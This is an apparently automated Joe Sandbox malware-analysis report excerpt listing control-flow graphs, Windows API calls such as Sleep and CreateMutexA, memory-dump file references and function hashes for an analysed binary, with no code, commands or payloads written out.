                                                                                                                                                                                                                                                  control_flow_graph 792 f39adc-f39ae8 793 f39aea-f39af8 792->793 794 f39afe-f39b27 call f4d663 792->794 793->794 795 f3a917 793->795 802 f39b55-f39b57 794->802 803 f39b29-f39b35 794->803 797 f3a953-f3a994 Sleep CreateMutexA 795->797 798 f3a917 call f66c6a 795->798 808 f3a9a7-f3a9a8 797->808 809 f3a996-f3a998 797->809 798->797 806 f39b65-f39d91 call f47a00 call f35c10 call f38b30 call f48220 call f47a00 call f35c10 call f38b30 call f48220 802->806 807 f39b59-f3a916 call f480c0 802->807 804 f39b37-f39b45 803->804 805 f39b4b-f39b52 call f4d663 803->805 804->795 804->805 805->802 809->808 810 f3a99a-f3a9a5 809->810 810->808
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 373187b08f876946073d8c2e6a687976980899ddeb6af84e4be1fe6be6cc3348
                                                                                                                                                                                                                                                  • Instruction ID: 2d24f7aa88979b73a5b77986f69b38419ae449d15de4e45c15c47caba6b07bcd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 373187b08f876946073d8c2e6a687976980899ddeb6af84e4be1fe6be6cc3348
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31214931B092049BFF189B6CEC89B6DF761EBC1330F204219E458D73D1DBB99981A712
                                                                                                                                                                                                                                                  Function 00F3A856 Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 5672f09e58409c0bfd63820231684aef1ab8def8b1c8601c18ac5aff4c50a00a
                                                                                                                                                                                                                                                  • Instruction ID: d3822e715eab4ae2acea667fdc1304df2ef8d677cb0262e794e585554d02c6e2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5672f09e58409c0bfd63820231684aef1ab8def8b1c8601c18ac5aff4c50a00a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA216D71749205CAFB2477699C9AB6DB6519F91330F200816E0C4D63C1CB7A8842B253
                                                                                                                                                                                                                                                  Function 00F3A34F Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 846 f3a34f-f3a35b 847 f3a371-f3a39a call f4d663 846->847 848 f3a35d-f3a36b 846->848 854 f3a3c8-f3a916 call f480c0 847->854 855 f3a39c-f3a3a8 847->855 848->847 849 f3a93a 848->849 851 f3a953-f3a994 Sleep CreateMutexA 849->851 852 f3a93a call f66c6a 849->852 862 f3a9a7-f3a9a8 851->862 863 f3a996-f3a998 851->863 852->851 857 f3a3aa-f3a3b8 855->857 858 f3a3be-f3a3c5 call f4d663 855->858 857->849 857->858 858->854 863->862 864 f3a99a-f3a9a5 863->864 864->862
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 1297c485a7108144ffea821325866216821826d713cd1b1032d25d8454fd13b1
                                                                                                                                                                                                                                                  • Instruction ID: fc69ee8574180373493bb800c86ffdc258c1dac106a98666291ed6eba4b2abb9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1297c485a7108144ffea821325866216821826d713cd1b1032d25d8454fd13b1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C219B327052049BFF189B6CEC89B6DFB62DBD1330F204219E448E73D0CB769981A762
                                                                                                                                                                                                                                                  Function 00F6D82F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F6A813,00000001,00000364,00000006,000000FF,?,00F6EE3F,?,00000004,00000000,?,?), ref: 00F6D871
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
